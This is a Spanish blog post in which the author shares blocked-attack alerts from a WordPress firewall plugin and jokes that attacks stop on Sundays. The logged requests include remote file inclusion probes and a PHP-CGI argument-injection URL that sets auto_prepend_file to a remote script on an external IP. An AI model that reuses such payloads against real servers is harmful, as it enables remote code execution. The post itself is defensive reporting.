Los hackers descansan los domingos

Me ha hecho mucha gracia cómo tras una semana recibiendo muchas más alertas de lo habitual, este domingo aún no me ha llegado ninguna.
En mi instalación de WordPress cuento con un plugin llamado WordPress Aplication Firewall que me notifica por e-mail cada vez que detiene una acción potencialmente peligrosa.

Como se puede ver en la siguiente imagen, la configuración es muy sencilla:
wpwafconf

Y las notificaciones tienen la siguiente pinta:
email

Es notable que la mayoría intentan hacer inyecciones en mi instalación de Open Pastebin NG, la cual desactivé hace ya bastante tiempo por otros motivos, así que supongo que ha terminado siendo una buena decisión. Si tienes una instalación de OPNG expuesta a la red, por favor, procura securizarla al máximo. Esto también me recuerda que debo seguir trabajando en su código fuente…
Lo más curioso del asunto es que en los últimos días ha habido un aumento notable de la actividad que WP_WAF ha retenido. Excepto hoy, domingo, porque… al séptimo, descansó 🙂
Os dejo unas pocas copias con lo más relevante de todo lo detectado:

== Attack Details ==

TYPE: Query RFI
MATCHED: "/DZpZZD0W0.xgj"
ACTION: Blocked

DATE/TIME: Sep 27 4:12:53 2013

FROM IP: http://whois.domaintools.com/157.55.33.88
URI: /emilio/code/view.php?id=$1$gQJNChKg$c29z0j/DZpZZD0W0.xgj40
STRING: id=$1$gQJNChKg$c29z0j/DZpZZD0W0.xgj40
METHOD: GET
USERAGENT: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
REFERRER:

== Attack Details ==

TYPE: Query RFI
MATCHED: "/DZpZZD0W0.xgj"
ACTION: Blocked

DATE/TIME: Sep 27 11:58:01 2013

FROM IP: http://whois.domaintools.com/65.55.213.58
URI: /emilio/code/view.php?id=$1$gQJNChKg$c29z0j/DZpZZD0W0.xgj40
STRING: id=$1$gQJNChKg$c29z0j/DZpZZD0W0.xgj40
METHOD: GET
USERAGENT: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729; MS-RTC LM 8)
REFERRER:

== Attack Details ==

TYPE: Query RFI
MATCHED: "http%3A%2F%2F61.19.253.26%2Fecho.txt"
ACTION: Blocked

DATE/TIME: Sep 24 15:50:55 2013

FROM IP: http://whois.domaintools.com/187.156.15.226
URI: /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt
STRING: -dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt
METHOD: GET
USERAGENT: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
REFERRER:

Vaya User-agents más chulos, eh?
Obviamente, este plugin solo es una de las medidas que tomo para proteger mi blog (y mi servidor). Si usas WordPress como plataforma de publicación, tú también deberías echarle un vistazo.

Anuncios

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s